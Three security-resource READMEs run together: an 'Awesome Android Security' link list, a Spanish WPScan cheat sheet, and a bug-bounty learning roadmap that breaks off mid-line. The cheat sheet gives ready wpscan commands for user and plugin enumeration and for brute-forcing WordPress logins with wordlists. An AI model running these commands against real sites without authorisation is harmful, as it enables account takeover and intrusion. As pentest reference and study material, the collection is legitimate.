# Awesome-Android-Security ![awesome](https://awesome.re/badge.svg) ![Screenshot](img/androidsec.png) # Table of Contents - [Blog](#blog) - [How To's](#how-tos) - [Papers](#paper) - [Books](#books) - [Trainings](#Trainings) - [Tools](#tools) * [Static Analysis Tools](#Static-Analysis) * [Dynamic Analysis Tools](#Dynamic-Analysis) * [Online APK Analyzers](#Online-APK-Analyzers) * [Online APK Decompiler](#Online-APK-Decompiler) * [Forensic Analysis Tools](#Forensic-Analysis) - [Labs](#labs) - [Talks](#talks) - [Misc](#misc) - [Bug Bounty & Writeups](#Bug-Bounty-&-Writeup) - [Cheat Sheet](#Cheat-Sheet) - [Checklist](#Checklist) - [Bug Bounty Report](#Bug-Bounty-Report) # Blogs * [Analysis of Android banking Trojan MaliBot that is based on S.O.V.A banker](https://www.f5.com/labs/articles/threat-intelligence/f5-labs-investigates-malibot) * [Pending Intents: A Pentester’s view](https://valsamaras.medium.com/pending-intents-a-pentesters-view-92f305960f03) * [Android security checklist: theft of arbitrary files](https://blog.oversecured.com/Android-security-checklist-theft-of-arbitrary-files/) * [Protecting Android users from 0-Day attacks](https://blog.google/threat-analysis-group/protecting-android-users-from-0-day-attacks/) * [Reversing an Android sample which uses Flutter](https://cryptax.medium.com/reversing-an-android-sample-which-uses-flutter-23c3ff04b847) * [Step-by-step guide to reverse an APK protected with DexGuard using Jadx](https://blog.lexfo.fr/dexguard.html) * [Use cryptography in mobile apps the right way](https://blog.oversecured.com/Use-cryptography-in-mobile-apps-the-right-way/) * [Android security checklist: WebView](https://blog.oversecured.com/Android-security-checklist-webview/) * [Common mistakes when using permissions in Android](https://blog.oversecured.com/Common-mistakes-when-using-permissions-in-Android/) * [Two weeks of securing Samsung devices: Part 2](https://blog.oversecured.com/Two-weeks-of-securing-Samsung-devices-Part-2/) * [Why dynamic code loading could be dangerous for your apps: a Google example](https://blog.oversecured.com/Why-dynamic-code-loading-could-be-dangerous-for-your-apps-a-Google-example/) * [Two weeks of securing Samsung devices: Part 1](https://blog.oversecured.com/Two-weeks-of-securing-Samsung-devices-Part-1/) * [How to exploit insecure WebResourceResponse configurations + an example of the vulnerability in Amazon apps](https://blog.oversecured.com/Android-Exploring-vulnerabilities-in-WebResourceResponse) * [Exploiting memory corruption vulnerabilities on Android + an example of such vulnerability in PayPal apps](https://blog.oversecured.com/Exploiting-memory-corruption-vulnerabilities-on-Android/) * [Capture all android network traffic](https://www.exandroid.dev/2021/03/21/capture-all-android-network-traffic/) * [Reverse Engineering Clubhouse](https://www.klmlabs.co/blog/club-house-observations-th5x8) * [Escape the Chromium sandbox on Android Devices](https://microsoftedge.github.io/edgevr/posts/yet-another-uaf/) * [Android Penetration Testing: Frida](https://www.hackingarticles.in/android-penetration-testing-frida/) * [Android: Gaining access to arbitrary* Content Providers](https://blog.oversecured.com/Gaining-access-to-arbitrary-Content-Providers/) * [Getting root on a 4G LTE mobile hotspot](https://alex.studer.dev/2021/01/04/mw41-1) * [Exploiting new-era of Request forgery on mobile applications](http://dphoeniixx.com/2020/12/13-2/) * [Deep Dive into an Obfuscation-as-a-Service for Android Malware](https://wwwstratosphereips.org/blog/2020/12/03/deep-dive-into-an-obfuscation-as-a-service-for-android-malware) * [Evernote: Universal-XSS, theft of all cookies from all sites, and more](https://blog.oversecured.com/Evernote-Universal-XSS-theft-of-all-cookies-from-all-sites-and-more/) * [Interception of Android implicit intents](https://blog.oversecured.com/Interception-of-Android-implicit-intents/) * [AAPG - Android application penetration testing guide](https://nightowl131.github.io/AAPG/) * [TikTok: three persistent arbitrary code executions and one theft of arbitrary files](https://blog.oversecured.com/Oversecured-detects-dangerous-vulnerabilities-in-the-TikTok-Android-app/) * [Persistent arbitrary code execution in Android's Google Play Core Library: details, explanation and the PoC - CVE-2020-8913](https://blog.oversecured.com/Oversecured-automatically-discovers-persistent-code-execution-in-the-Google-Play-Core-Library/) * [Android: Access to app protected components](https://blog.oversecured.com/Android-Access-to-app-protected-components/) * [Android: arbitrary code execution via third-party package contexts](https://blog.oversecured.com/Android-arbitrary-code-execution-via-third-party-package-contexts/) * [Android Pentesting Labs - Step by Step guide for beginners](https://medium.com/bugbountywriteup/android-pentesting-lab-4a6fe1a1d2e0) * [An Android Hacking Primer](https://medium.com/swlh/an-android-hacking-primer-3390fef4e6a0) * [An Android Security tips](https://developer.android.com/training/articles/security-tips) * [OWASP Mobile Security Testing Guide](https://www.owasp.org/index.php/OWASP_Mobile_Security_Testing_Guide) * [Security Testing for Android Cross Platform Application](https://3xpl01tc0d3r.blogspot.com/2019/09/security-testing-for-android-app-part1.html) * [Dive deep into Android Application Security](https://blog.0daylabs.com/2019/09/18/deep-dive-into-Android-security/) * [Pentesting Android Apps Using Frida](https://www.notsosecure.com/pentesting-android-apps-using-frida/) * [Mobile Security Testing Guide](https://mobile-security.gitbook.io/mobile-security-testing-guide/) * [Android Applications Reversing 101](https://www.evilsocket.net/2017/04/27/Android-Applications-Reversing-101/#.WQND0G3TTOM.reddit) * [Android Security Guidelines](https://developer.box.com/en/guides/security/) * [Android WebView Vulnerabilities](https://pentestlab.blog/2017/02/12/android-webview-vulnerabilities/) * [OWASP Mobile Top 10](https://www.owasp.org/index.php/OWASP_Mobile_Top_10) * [Practical Android Phone Forensics](https://resources.infosecinstitute.com/practical-android-phone-forensics/) * [Mobile Pentesting With Frida](https://drive.google.com/file/d/1JccmMLi6YTnyRrp_rk6vzKrUX3oXK_Yw/view) * [Zero to Hero - Mobile Application Testing - Android Platform](https://nileshsapariya.blogspot.com/2016/11/zero-to-hero-mobile-application-testing.html) * [Detecting Dynamic Loading in Android Applications](https://sayfer.io/blog/dynamic-loading-in-android-applications-with-proc-maps/) * [Static Analysis for Android and iOS](https://pentestwiki.org/static-analysis-for-android-and-ios) * [Dynamic Analysis for Android and iOS](https://pentestwiki.org/dynamic-analysis-for-android-and-ios) * [Exploring intent-based Android security vulnerabilities on Google Play (part 1/3)](https://snyk.io/blog/exploring-android-intent-based-security-vulnerabilities-google-play/) * [Hunting intent-based Android security vulnerabilities with Snyk Code (part 2/3)](https://snyk.io/blog/hunting-intent-based-android-security-vulnerabilities-with-snyk-code/) * [Mitigating and remediating intent-based Android security vulnerabilities (part 3/3)](https://snyk.io/blog/mitigating-remediating-intent-based-android-security-vulnerabilities/) # How To's * [How to analyze mobile malware: a Cabassous/FluBot Case study](https://blog.nviso.eu/2021/04/19/how-to-analyze-mobile-malware-a-cabassous-flubot-case-study/) * [How to Bypasses Iframe Sandboxing](https://blog.confiant.com/malvertiser-scamclub-bypasses-iframe-sandboxing-with-postmessage-shenanigans-cve-2021-1801-1c998378bfba) * [How To Configuring Burp Suite With Android Nougat](https://blog.ropnop.com/configuring-burp-suite-with-android-nougat/) * [How To Bypassing Xamarin Certificate Pinning](https://www.gosecure.net/blog/2020/04/06/bypassing-xamarin-certificate-pinning-on-android/) * [How To Bypassing Android Anti-Emulation](https://www.juanurs.com/Bypassing-Android-Anti-Emulation-Part-I/) * [How To Secure an Android Device](https://source.android.com/security) * [Android Root Detection Bypass Using Objection and Frida Scripts](https://medium.com/@GowthamR1/android-root-detection-bypass-using-objection-and-frida-scripts-d681d30659a7) * [Root Detection Bypass By Manual Code Manipulation.](https://medium.com/@sarang6489/root-detection-bypass-by-manual-code-manipulation-5478858f4ad1) * [Magisk Systemless Root - Detection and Remediation](https://www.mobileiron.com/en/blog/magisk-android-rooting) * [How to use FRIDA to bruteforce Secure Startup with FDE-encryption on a Samsung G935F running Android 8](https://github.com/Magpol/fridafde) # Papers * [AndrODet: An adaptive Android obfuscation detector](https://arxiv.org/pdf/1910.06192.pdf) * [GEOST BOTNET - the discovery story of a new Android banking trojan](http://public.avast.com/research/VB2019-Garcia-etal.pdf) * [Dual-Level Android Malware Detection](https://www.mdpi.com/2073-8994/12/7/1128) * [An Investigation of the Android Kernel Patch Ecosystem](https://www.usenix.org/conference/usenixsecurity21/presentation/zhang) # Books * [SEI CERT Android Secure Coding Standard](https://www.securecoding.cert.org/confluence/display/android/Android+Secure+Coding+Standard) * [Android Security Internals](https://www.oreilly.com/library/view/android-security-internals/9781457185496/) * [Android Cookbook](https://androidcookbook.com/) * [Android Hacker's Handbook](https://www.amazon.com/Android-Hackers-Handbook-Joshua-Drake/dp/111860864X) * [Android Security Cookbook](https://www.packtpub.com/in/application-development/android-security-cookbook) * [The Mobile Application Hacker's Handbook](https://www.amazon.in/Mobile-Application-Hackers-Handbook-ebook/dp/B00TSA6KLG) * [Android Malware and Analysis](https://www.oreilly.com/library/view/android-malware-and/9781482252200/) * [Android Security: Attacks and Defenses](https://www.crcpress.com/Android-Security-Attacks-and-Defenses/Misra-Dubey/p/book/9780367380182) * [Learning Penetration Testing For Android Devices](https://www.amazon.com/Learning-Penetration-Testing-Android-Devices-ebook/dp/B077L7SNG8) * [Android Hacking 2020 Edition](https://www.amazon.com/Hacking-Android-TERRY-D-CLARK-ebook/dp/B08MD2D1SJ) # Trainings * [SEC575: Mobile Device Security and Ethical Hacking](https://www.sans.org/cyber-security-courses/mobile-device-security-ethical-hacking/) * [Android Reverse Engineering_pt-BR](https://www.youtube.com/watch?v=eHdDS2e_qf0&list=PL4zZ9lJ-RCbfv6f6Jc8cJ4ljKqENkTfi7) * [Learning-Android-Security](https://www.lynda.com/Android-tutorials/Learning-Android-Security/689762-2.html) * [Advanced Android Development](https://developer.android.com/courses/advanced-training/overview) * [Learn the art of mobile app development](https://www.edx.org/professional-certificate/harvardx-computer-science-and-mobile-apps) * [Learning Android Malware Analysis](https://www.linkedin.com/learning/learning-android-malware-analysis) * [Android App Reverse Engineering 101](https://maddiestone.github.io/AndroidAppRE/) * [MASPT V2](https://www.elearnsecurity.com/course/mobile_application_security_and_penetration_testing/) * [Android Pentration Testing(Persian)](https://www.youtube.com/watch?v=XqS_bA6XfNU&list=PLvVo-xqnJCI7rftDaiEtWFLXlkxN-1Nxn) # Tools #### Static Analysis * [Deoptfuscator - Deobfuscator for Android Application](https://github.com/Gyoonus/deoptfuscator) * [Android Reverse Engineering WorkBench for VS Code](https://github.com/Surendrajat/APKLab) * [Apktool:A tool for reverse engineering Android apk files](https://ibotpeaches.github.io/Apktool/) * [quark-engine - An Obfuscation-Neglect Android Malware Scoring System](https://github.com/quark-engine/quark-engine) * [DeGuard:Statistical Deobfuscation for Android](http://apk-deguard.com/) * [jadx - Dex to Java decompiler](https://github.com/skylot/jadx/releases) * [Amandroid – A Static Analysis Framework](http://pag.arguslab.org/argus-saf) * [Androwarn – Yet Another Static Code Analyzer](https://github.com/maaaaz/androwarn/) * [Droid Hunter – Android application vulnerability analysis and Android pentest tool](https://github.com/hahwul/droid-hunter) * [Error Prone – Static Analysis Tool](https://github.com/google/error-prone) * [Findbugs – Find Bugs in Java Programs](http://findbugs.sourceforge.net/downloads.html) * [Find Security Bugs – A SpotBugs plugin for security audits of Java web applications.](https://github.com/find-sec-bugs/find-sec-bugs/) * [Flow Droid – Static Data Flow Tracker](https://github.com/secure-software-engineering/FlowDroid) * [Smali/Baksmali – Assembler/Disassembler for the dex format](https://github.com/JesusFreke/smali) * [Smali-CFGs – Smali Control Flow Graph’s](https://github.com/EugenioDelfa/Smali-CFGs) * [SPARTA – Static Program Analysis for Reliable Trusted Apps](https://www.cs.washington.edu/sparta) * [Gradle Static Analysis Plugin](https://github.com/novoda/gradle-static-analysis-plugin) * [Checkstyle – A tool for checking Java source code](https://github.com/checkstyle/checkstyle) * [PMD – An extensible multilanguage static code analyzer](https://github.com/pmd/pmd) * [Soot – A Java Optimization Framework](https://github.com/Sable/soot) * [Android Quality Starter](https://github.com/pwittchen/android-quality-starter) * [QARK – Quick Android Review Kit](https://github.com/linkedin/qark) * [Infer – A Static Analysis tool for Java, C, C++ and Objective-C](https://github.com/facebook/infer) * [Android Check – Static Code analysis plugin for Android Project](https://github.com/noveogroup/android-check) * [FindBugs-IDEA Static byte code analysis to look for bugs in Java code](https://plugins.jetbrains.com/plugin/3847-findbugs-idea) * [APK Leaks – Scanning APK file for URIs, endpoints & secrets](https://github.com/dwisiswant0/apkleaks) * [Trueseeing – fast, accurate and resillient vulnerabilities scanner for Android apps](https://github.com/monolithworks/trueseeing) * [StaCoAn – crossplatform tool which aids developers, bugbounty hunters and ethical hackers](https://github.com/vincentcox/StaCoAn) * [APKScanner](https://github.com/n3k00n3/APKScanner) * [Mobile Audit – Web application for performing Static Analysis and detecting malware in Android APKs](https://github.com/mpast/mobileAudit) #### Dynamic Analysis * [Mobile-Security-Framework MobSF](https://github.com/MobSF/Mobile-Security-Framework-MobSF) * [Magisk v23.0 - Root & Universal Systemless Interface](https://github.com/topjohnwu/Magisk) * [Runtime Mobile Security (RMS) - is a powerful web interface that helps you to manipulate Android and iOS Apps at Runtime](https://github.com/m0bilesecurity/RMS-Runtime-Mobile-Security) * [House: A runtime mobile application analysis toolkit with a Web GUI](https://github.com/nccgroup/house) * [Objection - Runtime Mobile Exploration toolkit, powered by Frida](https://github.com/sensepost/objection) * [Droid-FF - Android File Fuzzing Framework](https://github.com/antojoseph/droid-ff) * [Drozer](https://github.com/FSecureLABS/drozer) * [Inspeckage](https://github.com/ac-pm/Inspeckage) * [PATDroid - Collection of tools and data structures for analyzing Android applications](https://github.com/mingyuan-xia/PATDroid) * [Radare2 - Unix-like reverse engineering framework and commandline tools](https://github.com/radareorg/radare2) * [Cutter - Free and Open Source RE Platform powered by radare2](https://cutter.re/) * [ByteCodeViewer - Android APK Reverse Engineering Suite (Decompiler, Editor, Debugger)](https://bytecodeviewer.com/) #### Online APK Analyzers * [Guardsquare AppSweep](https://www.guardsquare.com/appsweep-mobile-application-security-testing) * [Oversecured](https://oversecured.com/) * [Android Observatory APK Scan](https:/androidobservatory.org/upload) * [AndroTotal](http://andrototal.org/) * [VirusTotal](https://www.virustotal.com/#/home/upload) * [Scan Your APK](https://scanyourapk.com/) * [AVC Undroid](https://undroid.av-comparatives.org/index.php) * [OPSWAT](https://metadefender.opswat.com/#!/) * [ImmuniWeb Mobile App Scanner](https://www.htbridge.com/mobile/) * [Ostor Lab](https://www.ostorlab.co/scan/mobile/) * [Quixxi](https://quixxisecurity.com/) * [TraceDroid](http://tracedroid.few.vu.nl/submit.php) * [Visual Threat](http://www.visualthreat.com/UIupload.action) * [App Critique](https://appcritique.boozallen.com/) * [Jotti's malware scan](https://virusscan.jotti.org/) * [kaspersky scanner](https://opentip.kaspersky.com/) #### Online APK Decompiler * [Android APK Decompiler](http://www.decompileandroid.com/) * [Java Decompiler APk](http://www.javadecompilers.com/apk) * [APK DECOMPILER APP](https://www.apkdecompilers.com/) * [DeAPK is an open-source, online APK decompiler ](https://deapk.vaibhavpandey.com/) * [apk and dex decompilation back to Java source code](http://www.decompiler.com/) * [APK Decompiler Tools](https://apk.tools/tools/apk-decompiler/alternateURL/) #### Forensic Analysis * [Forensic Analysis for Mobile Apps (FAMA)](https://github.com/labcif/FAMA) * [Andriller](https://github.com/den4uk/andriller) * [Autopsy](https://www.autopsy.com/) * [bandicoot](https://github.com/computationalprivacy/bandicoot) * [Fridump-A universal memory dumper using Frida](https://github.com/Nightbringer21/fridump) * [LiME - Linux Memory Extractor](https://github.com/504ensicsLabs/LiME) # Labs * [Damn-Vulnerable-Bank](https://github.com/rewanth1997/Damn-Vulnerable-Bank) * [OVAA (Oversecured Vulnerable Android App)](https://github.com/oversecured/ovaa) * [DIVA (Damn insecure and vulnerable App)](https://github.com/payatu/diva-android) * [OWASP Security Shepherd ](https://github.com/OWASP/SecurityShepherd) * [Damn Vulnerable Hybrid Mobile App (DVHMA)](https://github.com/logicalhacking/DVHMA) * [OWASP-mstg(UnCrackable Mobile Apps)](https://github.com/OWASP/owasp-mstg/tree/master/Crackmes) * [VulnerableAndroidAppOracle](https://github.com/dan7800/VulnerableAndroidAppOracle) * [Android InsecureBankv2](https://github.com/dineshshetty/Android-InsecureBankv2) * [Purposefully Insecure and Vulnerable Android Application (PIIVA)](https://github.com/htbridge/pivaa) * [Sieve app(An android application which exploits through android components)](https://github.com/mwrlabs/drozer/releases/download/2.3.4/sieve.apk) * [DodoVulnerableBank(Insecure Vulnerable Android Application that helps to learn hacing and securing apps)](https://github.com/CSPF-Founder/DodoVulnerableBank) * [Digitalbank(Android Digital Bank Vulnerable Mobile App)](https://github.com/CyberScions/Digitalbank) * [AppKnox Vulnerable Application](https://github.com/appknox/vulnerable-application) * [Vulnerable Android Application](https://github.com/Lance0312/VulnApp) * [Android Security Labs](https://github.com/SecurityCompass/AndroidLabs) * [Android-security Sandbox](https://github.com/rafaeltoledo/android-security) * [VulnDroid(CTF Style Vulnerable Android App)](https://github.com/shahenshah99/VulnDroid) * [FridaLab](https://rossmarks.uk/blog/fridalab/) * [Santoku Linux - Mobile Security VM](https://santoku-linux.com/) * [AndroL4b - A Virtual Machine For Assessing Android applications, Reverse Engineering and Malware Analysis](https://github.com/sh4hin/Androl4b) # Talks * [One Step Ahead of Cheaters -- Instrumenting Android Emulators](https://www.youtube.com/watch?v=L3AniAxp_G4) * [Vulnerable Out of the Box: An Evaluation of Android Carrier Devices](https://www.youtube.com/watch?v=R2brQvQeTvM) * [Rock appround the clock: Tracking malware developers by Android](https://www.youtube.com/watch?v=wd5OU9NvxjU) * [Chaosdata - Ghost in the Droid: Possessing Android Applications with ParaSpectre](https://www.youtube.com/watch?v=ohjTWylMGEA) * [Remotely Compromising Android and iOS via a Bug in Broadcom's Wi-Fi Chipsets](https://www.youtube.com/watch?v=TDk2RId8LFo) * [Honey, I Shrunk the Attack Surface – Adventures in Android Security Hardening](https://www.youtube.com/watch?v=EkL1sDMXRVk) * [Hide Android Applications in Images](https://www.youtube.com/watch?v=hajOlvLhYJY) * [Scary Code in the Heart of Android](https://www.youtube.com/watch?v=71YP65UANP0) * [Fuzzing Android: A Recipe For Uncovering Vulnerabilities Inside System Components In Android](https://www.youtube.com/watch?v=q_HibdrbIxo) * [Unpacking the Packed Unpacker: Reverse Engineering an Android Anti-Analysis Native Library](https://www.youtube.com/watch?v=s0Tqi7fuOSU) * [Android FakeID Vulnerability Walkthrough](https://www.youtube.com/watch?v=5eJYCucZ-Tc) * [Unleashing D* on Android Kernel Drivers](https://www.youtube.com/watch?v=1XavjjmfZAY) * [The Smarts Behind Hacking Dumb Devices](https://www.youtube.com/watch?v=yU1BrY1ZB2o) * [Overview of common Android app vulnerabilities](https://www.bugcrowd.com/resources/webinars/overview-of-common-android-app-vulnerabilities/) * [Advanced Android Bug Bounty skills](https://www.youtube.com/watch?v=OLgmPxTHLuY) * [Android security architecture](https://www.youtube.com/watch?v=3asW-nBU-JU) * [Get the Ultimate Privilege of Android Phone](https://vimeo.com/335948808) * [Securing the System: A Deep Dive into Reversing Android Pre-Installed Apps](https://www.youtube.com/watch?v=U6qTcpCfuFc) * [Bad Binder: Finding an Android In The Wild 0day](https://www.youtube.com/watch?v=TAwQ4ezgEIo) * [Deep dive into ART(Android Runtime) for dynamic binary analysis](https://www.youtube.com/watch?v=mFq0vNvUgj8) # Misc * [Android Malware Adventures](https://docs.google.com/presentation/d/1pYB522E71hXrp4m3fL3E3fnAaOIboJKqpbyE5gSsOes/edit) * [Android-Reports-and-Resources](https://github.com/B3nac/Android-Reports-and-Resources/blob/master/README.md) * [Hands On Mobile API Security](https://hackernoon.com/hands-on-mobile-api-security-get-rid-of-client-secrets-a79f111b6844) * [Android Penetration Testing Courses](https://medium.com/mobile-penetration-testing/android-penetration-testing-courses-4effa36ac5ed) * [Lesser-known Tools for Android Application PenTesting](https://captmeelo.com/pentest/2019/12/30/lesser-known-tools-for-android-pentest.html) * [android-device-check - a set of scripts to check Android device security configuration](https://github.com/nelenkov/android-device-check) * [apk-mitm - a CLI application that prepares Android APK files for HTTPS inspection](https://github.com/shroudedcode/apk-mitm) * [Andriller - is software utility with a collection of forensic tools for smartphones](https://github.com/den4uk/andriller) * [Dexofuzzy: Android malware similarity clustering method using opcode sequence-Paper](https://www.virusbulletin.com/virusbulletin/2019/11/dexofuzzy-android-malware-similarity-clustering-method-using-opcode-sequence/) * [Chasing the Joker](https://docs.google.com/presentation/d/1sFGAERaNRuEORaH06MmZKeFRqpJo1ol1xFieUa1X_OA/edit#slide=id.p1) * [Side Channel Attacks in 4G and 5G Cellular Networks-Slides](https://i.blackhat.com/eu-19/Thursday/eu-19-Hussain-Side-Channel-Attacks-In-4G-And-5G-Cellular-Networks.pdf) * [Shodan.io-mobile-app for Android](https://github.com/PaulSec/Shodan.io-mobile-app) * [Popular Android Malware 2018](https://github.com/sk3ptre/AndroidMalware_2018) * [Popular Android Malware 2019](https://github.com/sk3ptre/AndroidMalware_2019) * [Popular Android Malware 2020](https://github.com/sk3ptre/AndroidMalware_2020) # Bug Bounty & Writeups * [Hacker101 CTF: Android Challenge Writeups](https://medium.com/bugbountywriteup/hacker101-ctf-android-challenge-writeups-f830a382c3ce) * [Arbitrary code execution on Facebook for Android through download feature](https://medium.com/@dPhoeniixx/arbitrary-code-execution-on-facebook-for-android-through-download-feature-fb6826e33e0f) * [RCE via Samsung Galaxy Store App](https://labs.f-secure.com/blog/samsung-s20-rce-via-samsung-galaxy-store-app/) # Cheat Sheet * [Mobile Application Penetration Testing Cheat Sheet](https://github.com/sh4hin/MobileApp-Pentest-Cheatsheet) * [ADB (Android Debug Bridge) Cheat Sheet](https://www.mobileqaengineer.com/blog/2020/2/4/adb-android-debug-bridge-cheat-sheet) * [Frida Cheatsheet and Code Snippets for Android](https://erev0s.com/blog/frida-code-snippets-for-android/) # Checklists * [Android Pentesting Checklist](https://mobexler.com/checklist.htm#android) * [OWASP Mobile Security Testing Guide (MSTG)](https://github.com/OWASP/owasp-mstg/tree/master/Checklists) * [OWASP Mobile Application Security Verification Standard (MASVS)](https://github.com/OWASP/owasp-masvs) # Bug Bounty Reports * [List of Android Hackerone disclosed reports](https://github.com/B3nac/Android-Reports-and-Resources) * [How to report security issues](https://source.android.com/security/overview/updates-resources#report-issues)
# WPScan Cheat Sheet #### Uso Básico ``` wpscan --url <Target> -v ``` #### Uso Básico y ocultar el banner de inicio ``` wpscan --url <Target> -v --no-banner ``` #### Escaneo Rápido ``` wpscan --url <Target> --threads 8 ``` #### Guardar el resultado en un archivo ``` wpscan --url <Target> -o <FileName> ``` #### Enumerar plugins, usuarios, temas, timthumbs ``` wpscan --url <Target> --enumerate vp,u,vt,tt ``` #### Enumerar plugins usando nuestro API Token; Donde API Token lo pueden obtener desde https://wpvulndb.com/users/sign_up ``` wpscan --api-token <API-Token> --url <Target> --plugins-detection aggressive --enumerate vp ``` #### Enumerar todos los plugins ``` wpscan --url <Target> --enumerate ap ``` #### Usar un HTTP proxy ``` wpscan --url <Target> --proxy IP:PORT ``` #### Usar un SOCKS5 proxy (necesita cURL >= v7.21.7) ``` wpscan --url <Target> --proxy socks5://IP:PORT ``` #### Deshabilitar la verificación del certificado SSL/TLS ``` wpscan --url <Target> --disable-tls-checks --enumerate vp,u -o <FileName> ``` #### Autenticación básica HTTP ``` wpscan --url <Target> --basic-auth <Username:Password> ``` #### Fuerza Bruta para el inicio de sesión ``` wpscan --url <Target> --passwords <Wordlist-Password> --usernames <Wordlist-UserName> ``` #### Proporcionar cookie para sesiones autenticadas ``` wpscan --url <Target> --cookie <Cookie> ``` #### Escaneo Agresivo ``` wpscan --url <Target> --enumerate ap --plugins-detection mixed ``` --- [:arrow_left: Regresar](https://github.com/m4lal0/cheatsheets)
# Ethical-hacking-Roadmap & bug hunting Roadmap This is a resource factory for anyone looking forward to starting bug hunting and Ethical hacking would require guidance as a beginner. Hi! I'm Ashutosh chandra shah . I am currently working as a Security Engineer . I am creating this repository for everyone to contribute as to guide the young and enthusiastic minds for starting their career in bug bounties. More content will be added regularly. Keep following. So let's get started! NOTE: The bug bounty landscape has changed since the last few years. The issues we used to find easily an year ago would not be easy now. Automation is being used rigorously and most of the "low hanging fruits" are being duplicated if you are out of luck. If you want to start doing bug bounty, you will have to be determined to be consistent and focused, as the competition is very high. # Introduction What is a bug? - Security bug or vulnerability is “a weakness in the computational logic (e.g., code) found in software and hardware components that, when exploited, results in a negative impact to confidentiality, integrity, OR availability. #What is Bug Bounty? A bug bounty or bug bounty program is IT jargon for a reward or bounty program given for finding and reporting a bug in a particular software product. Many IT companies offer bug bounties to drive product improvement and get more interaction from end users or clients. Companies that operate bug bounty programs may get hundreds of bug reports, including security bugs and security vulnerabilities, and many who report those bugs stand to receive awards. #What is the Reward? There are all types of rewards based on the severity of the issue and the cost to fix. They may range from real money (most prevalent) to premium subscriptions (Prime/Netflix), discount coupons (for e commerce of shopping sites), gift vouchers, swags (apparels, badges, customized stationery, etc.). Money may range from 50$ to 50,000$ and even more. What to learn? Technical # Computer Fundamentals https://www.comptia.org/training/by-certification/a https://www.youtube.com/watch?v=tIfRDPekybU https://www.tutorialspoint.com/computer_fundamentals/index.htm https://onlinecourses.swayam2.ac.in/cec19_cs06/preview https://www.udemy.com/course/complete-computer-basics-course/ https://www.coursera.org/courses?query=computer%20fundamentals # Computer Networking https://www.youtube.com/watch?v=0AcpUwnc12E&list=PLkW9FMxqUvyZaSQNQslneeODER3bJCb2K https://www.youtube.com/watch?v=qiQR5rTSshw -https://www.youtube.com/watch?v=L3ZzkOTDins https://www.udacity.com/course/computer-networking--ud436 https://www.coursera.org/professional-certificates/google-it-support https://www.udemy.com/course/introduction-to-computer-networks/ NetworkChuck: https://www.youtube.com/c/NetworkChuck # Operating Systems https://www.youtube.com/watch?v=z2r-p7xc7c4 https://www.youtube.com/watch?v=_tCY-c-sPZc https://www.coursera.org/learn/os-power-user https://www.udacity.com/course/introduction-to-operating-systems--ud923 https://www.udemy.com/course/linux-command-line-volume1/ https://www.youtube.com/watch?v=v_1zB2WNN14 # Command Line Windows: https://www.youtube.com/watch?v=TBBbQKp9cKw&list=PLRu7mEBdW7fDTarQ0F2k2tpwCJg_hKhJQ https://www.youtube.com/watch?v=fid6nfvCz1I&list=PLRu7mEBdW7fDlf80vMmEJ4Vw9uf2Gbyc_ https://www.youtube.com/watch?v=UVUd9_k9C6A # Linux: https://www.youtube.com/watch?v=fid6nfvCz1I&list=PLRu7mEBdW7fDlf80vMmEJ4Vw9uf2Gbyc_ https://www.youtube.com/watch?v=UVUd9_k9C6A - https://www.youtube.com/watch?v=GtovwKDemnI https://www.youtube.com/watch?v=2PGnYjbYuUo https://www.youtube.com/watch?v=e7BufAVwDiM&t=418s https://www.youtube.com/watch?v=bYRfRGbqDIw&list=PLkPmSWtWNIyTQ1NX6MarpjHPkLUs3u1wG&index=4 # Programming C https://www.youtube.com/watch?v=irqbmMNs2Bo https://www.youtube.com/watch?v=ZSPZob_1TOk https://www.programiz.com/c-programming Python https://www.youtube.com/watch?v=ZLga4doUdjY&t=30352s https://www.youtube.com/watch?v=gfDE2a7MKjA https://www.youtube.com/watch?v=eTyI-M50Hu4 JavaScript https://www.youtube.com/watch?v=-lCF2t6iuUc https://www.youtube.com/watch?v=hKB-YGF14SY&t=1486s https://www.youtube.com/watch?v=jS4aFq5-91M PHP https://www.youtube.com/watch?v=1SnPKhCdlsU https://www.youtube.com/watch?v=OK_JCtrrv-c https://www.youtube.com/watch?v=T8SEGXzdbYg&t=1329s # Where to learn from? # Books Web Application Hacker's Handbook: https://www.amazon.com/Web-Application-Hackers-Handbook-Exploiting/dp/1118026470 Real World Bug Hunting: https://www.amazon.in/Real-World-Bug-Hunting-Field-Hacking-ebook/dp/B072SQZ2LG Bug Bounty Hunting Essentials: https://www.amazon.in/Bug-Bounty-Hunting-Essentials-Quick-paced-ebook/dp/B079RM344H Bug Bounty Bootcamp: https://www.amazon.in/Bug-Bounty-Bootcamp-Reporting-Vulnerabilities-ebook/dp/B08YK368Y3 Hands on Bug Hunting: https://www.amazon.in/Hands-Bug-Hunting-Penetration-Testers-ebook/dp/B07DTF2VL6 Hacker's Playbook 3: https://www.amazon.in/Hacker-Playbook-Practical-Penetration-Testing/dp/1980901759 OWASP Testing Guide: https://www.owasp.org/index.php/OWASP_Testing_Project Web Hacking 101: https://www.pdfdrive.com/web-hacking-101-e26570613.html OWASP Mobile Testing Guide :https://www.owasp.org/index.php/OWASP_Mobile_Security_Testing_Guide # Writeups Medium: https://medium.com/analytics-vidhya/a-beginners-guide-to-cyber-security-3d0f7891c93a Infosec Writeups: https://infosecwriteups.com/?gi=3149891cc73d Hackerone Hacktivity: https://hackerone.com/hacktivity Google VRP Writeups: https://github.com/xdavidhu/awesome-google-vrp-writeups # Blogs and Articles Hacking Articles: https://www.hackingarticles.in/ Vickie Li Blogs: https://vickieli.dev/ Bugcrowd Blogs: https://www.bugcrowd.com/blog/ Intigriti Blogs: https://blog.intigriti.com/ Portswigger Blogs: https://portswigger.net/blog Forums Reddit: https://www.reddit.com/r/websecurity/ Reddit: https://www.reddit.com/r/netsec/ Bugcrowd Discord: https://discord.com/invite/TWr3Brs Official Websites OWASP: https://owasp.org/ PortSwigger: https://portswigger.net/ Cloudflare: https://www.cloudflare.com/ YouTube Channels English zSecurity: https://www.youtube.com/c/zSecurity Insider PHD: https://www.youtube.com/c/InsiderPhD Stok: https://www.youtube.com/c/STOKfredrik Bug Bounty Reports Explained: https://www.youtube.com/c/BugBountyReportsExplained Vickie Li: https://www.youtube.com/c/VickieLiDev Hacking Simplified: https://www.youtube.com/c/HackingSimplifiedAS Pwn function :https://www.youtube.com/c/PwnFunction Farah Hawa: https://www.youtube.com/c/FarahHawa XSSRat: https://www.youtube.com/c/TheXSSrat Zwink: https://www.youtube.com/channel/UCDl4jpAVAezUdzsDBDDTGsQ Live Overflow :https://www.youtube.com/c/LiveOverflow Loi Liang Yang :https://www.youtube.com/c/LoiLiangYang David Bombal :https://www.youtube.com/c/DavidBombal Domain of Science : 